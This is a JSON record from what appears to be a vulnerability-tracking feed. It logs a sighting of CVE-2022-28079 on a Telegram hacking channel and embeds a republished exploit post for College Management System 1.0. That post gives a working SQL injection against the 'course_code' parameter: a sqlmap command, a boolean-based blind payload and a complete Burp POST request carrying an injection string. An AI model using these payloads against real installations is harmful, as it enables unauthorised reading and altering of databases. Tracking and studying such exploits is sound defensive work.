{"uuid": "ff10399a-8c8a-415e-9fab-fcb0b4eb3749", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-28079", "type": "seen", "source": "https://t.me/hacking_Attack/53215", "content": "Exploit Collector\nCollege Management System 1.0 SQL Injection\n\nhttps://4.bp.blogspot.com/-1sVwQJsRVpo/WWlvgaUDftI/AAAAAAAAIQM/9m_QfduSdAQi14Fs6kLQe2-YLO5Bx1iKQCLcBGAs/s1600/h87.png \nCollege Management System version 1.0 suffers from a remote SQL injection vulnerability.\n\nSHA-256 | b22b4daf0882e631e72558215fc7c93f3286e35a1f1f3a8a70f7fb9b95c0a356\n\nDownload\n# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)\n# Date: 2022-24-03\n# Exploit Author: Eren Gozaydin\n# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/\n# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f\n# Version: 1.0\n# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51\n# CVE: CVE-2022-28079\n# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079\n\n------------------------------------------------------------------------------------\n\n1. Description:\n----------------------\n\nCollege Management System 1.0 allows SQL Injection via parameter 'course_code' in\n/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise\nthe application, access or modify data, or exploit latent vulnerabilities\nin the underlying database.\n2. Proof of Concept:\n----------------------\n\nIn Burpsuite intercept the request from the affected page with\n'course_code' parameter and save it like poc.txt Then run SQLmap to extract the\ndata from the database:\n\nsqlmap -r poc.txt --dbms=mysql\n3. Example payload:\n----------------------\n\nboolean-based blind\nPayload: submit=Press&amp;roll_no=3&amp;course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ\n4. Burpsuite request:\n----------------------\n\nPOST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1\nHost: localhost\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-us,en;q=0.5\nCache-Control: no-cache\nContent-Length: 80\nContent-Type: application/x-www-form-urlencoded\nCookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe\nReferer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\n\nsubmit=Press&amp;roll_no=3&amp;course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns\n\n\nSource:packetstormsecurity.com", "creation_timestamp": "2026-09-02T01:01:50.837167Z"}